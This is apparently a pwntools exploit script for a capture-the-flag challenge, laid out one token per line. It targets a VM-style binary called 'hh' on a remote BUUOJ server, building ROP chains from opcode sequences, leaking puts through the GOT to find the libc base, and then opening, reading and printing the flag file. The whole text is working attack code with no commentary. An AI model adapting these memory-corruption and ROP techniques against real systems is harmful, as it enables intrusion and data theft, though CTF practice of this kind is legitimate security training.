from
pwn
import
*
context(os
=
'linux'
,arch
=
'amd64'
,log_level
=
'debug'
)
r
=
remote(
"node3.buuoj.cn"
,
27223
)
elf
=
ELF(
'./hh'
)
pop_rdi
=
0x4011A3
main
=
0x000000000401084
buf
=
0x602060
read
=
0x0000000000400710
pop_rsi_r15
=
0x0000000004011A1
puts_plt
=
0x4006f0
puts_got
=
0x601FA8
start
=
0x400750
def
code(cod):
out1
=
b''
for
i
in
cod:
out1
+
=
p32(i)
return
out1
def
stack(buf):
out2
=
b''
for
i
in
range
(
len
(buf)):
out2
+
=
code([
9
, buf[i]&
0xffffffff
,
12
, i
*
2
+
1007
,
9
, buf[i] >>
32
,
12
, i
*
2
+
1008
])
return
out2
r.recvuntil(
"choice :"
)
r.sendline(
'1'
)
r.recvuntil(
"code:"
)
payload1
=
stack([pop_rdi,puts_got,puts_plt,start])
r.send(payload1)
r.recvuntil(
"choice :"
)
r.sendline(
'2'
)
r.recv()
libc_base
=
u64(r.recvline()[:
-
1
].ljust(
8
, b
'\x00'
))
-
0x06f6a0
log.info(
hex
(libc_base))
open_addr
=
libc_base
+
0xF70F0
r.recvuntil(
"choice :"
)
r.sendline(
'1'
)
r.recvuntil(
"code:"
)
payload1
=
code([
6
,
4
,
0x67616c66
,
0
])
+
stack([pop_rdi, buf
+
8
, open_addr ,start])
r.send(payload1)
r.recvuntil(
"choice :"
)
r.sendline(
'2'
)
r.recvuntil(
"choice :"
)
r.sendline(
'1'
)
r.recvuntil(
"code:"
)
payload1
=
stack([pop_rdi ,
3
, pop_rsi_r15 , buf
+
0x500
,
0
, read , start])
r.send(payload1)
r.recvuntil(
"choice :"
)
r.sendline(
'2'
)
r.recvuntil(
"choice :"
)
r.sendline(
'1'
)
r.recvuntil(
"code:"
)
payload1
=
stack([pop_rdi , buf
+
0x500
, puts_plt , start])
r.send(payload1)
r.recvuntil(
"choice :"
)
r.sendline(
'2'
)
r.recv()
r.interactive()